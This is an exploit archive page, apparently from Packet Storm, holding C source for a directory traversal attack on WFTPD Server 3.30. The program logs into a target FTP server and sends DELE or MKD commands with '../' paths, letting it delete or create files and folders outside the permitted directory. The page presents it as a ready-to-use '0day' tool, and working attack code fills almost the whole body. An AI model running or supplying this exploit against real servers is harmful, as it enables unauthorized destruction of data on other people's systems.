exploit the possibilities

WFTPD Server 3.30 Directory Traversal

WFTPD Server 3.30 Directory Traversal
Posted May 14, 2010
Authored by fl0 fl0w

WFTPD Server version 3.30 directory traversal exploit.

tags | exploit, file inclusion
MD5 | 2fe84ebe96ea517db3be83e48abefff5

WFTPD Server 3.30 Directory Traversal

Change Mirror Download
#include<stdio.h>
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<unistd.h>

#define ALOC(tip,n) (tip*)malloc(sizeof(tip)*n)
#define POCNAME "[*]WFTPD 3.30 Multiple remote vulnerabilities(0day)"
#define AUTHOR "[*]fl0 fl0w"
typedef int i32;
typedef char i8;
typedef short i16;
enum {
True=1,
False=0,
Error=-1
};
struct {
i8 *USERx,
*PASSx,
*HOST;
i16 PORTx;
}def;
i8 *USER=0,*PASS=0,*dir=0,*host_addr=0,
sendbytes[250],recev[250];
i16 PORT=0,option;
i32 args(i32 argc,i8** argv){
i32 i;
argc--;
for(i=1;i<argc;i++){
switch(argv[i][1]){
case 'h':
host_addr=argv[++i];
break;
case 'u':
USER=argv[++i];
break;
case 'w':
PASS=argv[++i];
break;
case 'p':
PORT=atoi(argv[++i]);
break;
case 'o':
option=atoi(argv[++i]);
break;
default:{
printf("error with argument nr %d:(%s)\n",i,argv[i]);
return Error;
exit(0);
}
}
}
// printf(" %s\n %s\n %s\n %d\n %d\n %s\n",host_addr,USER,PASS,PORT,option,argv[argc]);
return 1;
}
void bf_error(i8* B){
i32 e;
if(B==NULL)
e=0;
else
e=1;
}
void syntax(){
i8 *help[]={"\t-h hostname",
"\t-u Username",
"\t-w watchword(password)",
"\t-p port(default 21)",
"\t-o option:",
"\t 1 - delete folder,files",
"\t 2 - make folder",
"\t ../ move up 1 dir ../../ move up 2 dirs etc"
/*directory transversal*/
};
i32 i;
size_t com=sizeof help / sizeof help[0];
for(i=0;i<com;i++){
printf("%s\n",help[i]);
}
}
void defaults(){
def.HOST="localhost";
def.PASSx="hacker";
def.USERx="anonymous";
def.PORTx=21;
//printf("%s %s %s %d",def.HOST,def.PASSx,def.USERx,def.PORTx);
}
i32 main(i32 argc,i8** argv){
if(argc<3){
printf("%s\n%s\n",POCNAME,AUTHOR);
printf("\tToo few arguments\n syntax is:\n");
syntax();
exit(0);
}
args(argc,argv);
i32 sok,
svcon,
sokaddr;
printf("[*]Starting \n \t...\n");
struct sockaddr_in sockaddr_sok;
sokaddr = sizeof(sockaddr_sok);
sockaddr_sok.sin_family = AF_INET;
sockaddr_sok.sin_addr.s_addr = inet_addr(host_addr);
sockaddr_sok.sin_port = htons(PORT);
sok=socket(AF_INET,SOCK_STREAM,0);
if(sok==-1){
printf("[*]FAILED SOCKET\n");
exit(0);
}
svcon=connect(sok,(struct sockaddr*)&sockaddr_sok,sokaddr);
i8 use[10];
if(svcon!=-1){
sprintf(sendbytes, "USER %s\r\n",USER);
if(send(sok,sendbytes,strlen(sendbytes),0) == -1){
printf("User send error\n");
shutdown(sok,1);
exit(0);
}else {
memset(sendbytes,0,250);
recv(sok,recev,sizeof(recev),0);
}

sprintf(sendbytes, "PASS %s\r\n",PASS);
if(send(sok,sendbytes,strlen(sendbytes),0) == -1){
printf("Password send error\n");
shutdown(sok,1);
exit(0);
}else {
memset(sendbytes,0,250);
recv(sok,recev,sizeof(recev),0);
printf("%s\n",recev);
}
sprintf(sendbytes, "SYST\r\n");
if(send(sok,sendbytes,strlen(sendbytes),0) == -1){
printf("Syst send error\n");
shutdown(sok,1);
exit(0);
}else {
memset(sendbytes,0,250);
recv(sok,recev,sizeof(recev),0);
}
if(option==1){
sprintf(sendbytes,"DELE %s\r\n",argv[11]);
if(send(sok,sendbytes,strlen(sendbytes),0) == -1){
printf("Syst send error\n");
shutdown(sok,1);
exit(0);
}else {
memset(sendbytes,0,250);
recv(sok,recev,sizeof(recev),0);
}
}else if(option==2){
sprintf(sendbytes,"MKD %s\r\n",argv[11]);
if(send(sok,sendbytes,strlen(sendbytes),0) == -1){
printf("Syst send error\n");
shutdown(sok,1);
exit(0);
}else {
memset(sendbytes,0,250);
recv(sok,recev,sizeof(recev),0);
}
}
}else printf("Connect error\n");
printf("[*]Exploit done!");
return 0;
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    11 Files
  • 21
    May 21st
    21 Files
  • 22
    May 22nd
    20 Files
  • 23
    May 23rd
    36 Files
  • 24
    May 24th
    2 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close